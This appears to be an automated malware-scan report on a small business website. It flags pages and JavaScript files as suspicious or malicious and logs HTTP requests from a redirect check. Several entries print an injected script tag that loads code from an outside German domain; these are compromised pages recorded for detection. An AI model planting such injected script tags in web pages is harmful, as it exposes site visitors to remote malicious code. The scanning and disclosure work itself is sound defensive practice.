Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=jmassociates.globat.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://jmassociates.globat.com/ | 200 OK Content-Length: 9423 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://ostseeferienhof.de/kzrtqb8y.php?id=189845"></script> | ||
http://jmassociates.globat.com/SpryAssets/SpryMenuBar.js | 200 OK Content-Length: 13067 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Spry; if(!Spry) { Spry = {}; } if(!Spry.Widget) { Spry.Widget = {}; } Spry.Widget.MenuBar = function(element, opts) { this.init(element, opts); }; Spry.Widget.MenuBar.prototype.init = function(element, opts) { this.element = this.getElement(element); this.currMenu = null; var isie = (typeof document.all != 'undefined' && typeof window.opera == 'undefined' && navigator.vendor != 'KDE'); if(typeof d Antivirus reports:
| ||
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js | 200 OK Content-Length: 72174 Content-Type: text/javascript | clean |
http://jmassociates.globat.com/fadeslideshow.js | 200 OK Content-Length: 17524 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var fadeSlideShow_descpanel={ controls: [['x.png',7,7], ['restore.png',10,11], ['loading.gif',54,55]], fontStyle: 'normal 11px Verdana', slidespeed: 200 } jQuery.noConflict() function fadeSlideShow(settingarg){ this.setting=settingarg settingarg=null var setting=this.setting setting.fadeduration=setting.fadeduration? parseInt(setting.fadeduration) : 500 setting.curimage=(setting.persist)? fadeSlideShow.routines.getCookie("gallery-" setting.wrapperid) : 0 Antivirus reports:
| ||
http://jmassociates.globat.com/index.html | 200 OK Content-Length: 9423 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://ostseeferienhof.de/kzrtqb8y.php?id=189845"></script> | ||
http://jmassociates.globat.com/espanol/index.html | 200 OK Content-Length: 9848 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://ostseeferienhof.de/kzrtqb8y.php?id=190141"></script> | ||
http://jmassociates.globat.com/espanol/../SpryAssets/SpryMenuBar.js | 200 OK Content-Length: 13067 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Spry; if(!Spry) { Spry = {}; } if(!Spry.Widget) { Spry.Widget = {}; } Spry.Widget.MenuBar = function(element, opts) { this.init(element, opts); }; Spry.Widget.MenuBar.prototype.init = function(element, opts) { this.element = this.getElement(element); this.currMenu = null; var isie = (typeof document.all != 'undefined' && typeof window.opera == 'undefined' && navigator.vendor != 'KDE'); if(typeof d Antivirus reports:
| ||
http://jmassociates.globat.com/espanol/../fadeslideshow.js | 200 OK Content-Length: 17524 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var fadeSlideShow_descpanel={ controls: [['x.png',7,7], ['restore.png',10,11], ['loading.gif',54,55]], fontStyle: 'normal 11px Verdana', slidespeed: 200 } jQuery.noConflict() function fadeSlideShow(settingarg){ this.setting=settingarg settingarg=null var setting=this.setting setting.fadeduration=setting.fadeduration? parseInt(setting.fadeduration) : 500 setting.curimage=(setting.persist)? fadeSlideShow.routines.getCookie("gallery-" setting.wrapperid) : 0 Antivirus reports:
| ||
http://jmassociates.globat.com/espanol/../index.html | 200 OK Content-Length: 9423 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://ostseeferienhof.de/kzrtqb8y.php?id=189845"></script> | ||
http://jmassociates.globat.com/espanol/../espanol/index.html | 200 OK Content-Length: 9848 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://ostseeferienhof.de/kzrtqb8y.php?id=190141"></script> | ||
http://jmassociates.globat.com/espanol/../espanol/../SpryAssets/SpryMenuBar.js | 200 OK Content-Length: 13067 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Spry; if(!Spry) { Spry = {}; } if(!Spry.Widget) { Spry.Widget = {}; } Spry.Widget.MenuBar = function(element, opts) { this.init(element, opts); }; Spry.Widget.MenuBar.prototype.init = function(element, opts) { this.element = this.getElement(element); this.currMenu = null; var isie = (typeof document.all != 'undefined' && typeof window.opera == 'undefined' && navigator.vendor != 'KDE'); if(typeof d Antivirus reports:
| ||
http://jmassociates.globat.com/espanol/../espanol/../fadeslideshow.js | 200 OK Content-Length: 17524 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var fadeSlideShow_descpanel={ controls: [['x.png',7,7], ['restore.png',10,11], ['loading.gif',54,55]], fontStyle: 'normal 11px Verdana', slidespeed: 200 } jQuery.noConflict() function fadeSlideShow(settingarg){ this.setting=settingarg settingarg=null var setting=this.setting setting.fadeduration=setting.fadeduration? parseInt(setting.fadeduration) : 500 setting.curimage=(setting.persist)? fadeSlideShow.routines.getCookie("gallery-" setting.wrapperid) : 0 Antivirus reports:
| ||
http://jmassociates.globat.com/espanol/../espanol/../index.html | 200 OK Content-Length: 9423 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://ostseeferienhof.de/kzrtqb8y.php?id=189845"></script> | ||
http://jmassociates.globat.com/espanol/../espanol/../espanol/index.html | 200 OK Content-Length: 9848 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://ostseeferienhof.de/kzrtqb8y.php?id=190141"></script> | ||
http://jmassociates.globat.com/espanol/../espanol/../espanol/../SpryAssets/SpryMenuBar.js | 200 OK Content-Length: 13067 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Spry; if(!Spry) { Spry = {}; } if(!Spry.Widget) { Spry.Widget = {}; } Spry.Widget.MenuBar = function(element, opts) { this.init(element, opts); }; Spry.Widget.MenuBar.prototype.init = function(element, opts) { this.element = this.getElement(element); this.currMenu = null; var isie = (typeof document.all != 'undefined' && typeof window.opera == 'undefined' && navigator.vendor != 'KDE'); if(typeof d Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: jmassociates.globat.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3600
Connection: close
Date: Mon, 29 Sep 2014 03:22:31 GMT
Accept-Ranges: bytes
Age: 0
ETag: "24cf-502294e250e38"
Server: Apache/2
Content-Length: 9423
Content-Type: text/html
Expires: Mon, 29 Sep 2014 04:22:31 GMT
Last-Modified: Wed, 03 Sep 2014 13:35:11 GMT
...9423 bytes of data.
GET / HTTP/1.1
Host: jmassociates.globat.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3600
Connection: close
Date: Mon, 29 Sep 2014 03:22:31 GMT
Accept-Ranges: bytes
Age: 0
ETag: "24cf-502294e250e38"
Server: Apache/2
Content-Length: 9423
Content-Type: text/html
Expires: Mon, 29 Sep 2014 04:22:31 GMT
Last-Modified: Wed, 03 Sep 2014 13:35:11 GMT
...9423 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: jmassociates.globat.com
Referer: http://www.google.com/search?q=jmassociates.globat.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: jmassociates.globat.com
Referer: http://www.google.com/search?q=jmassociates.globat.com
Result:
The result is similar to the first query. There are no suspicious redirects found.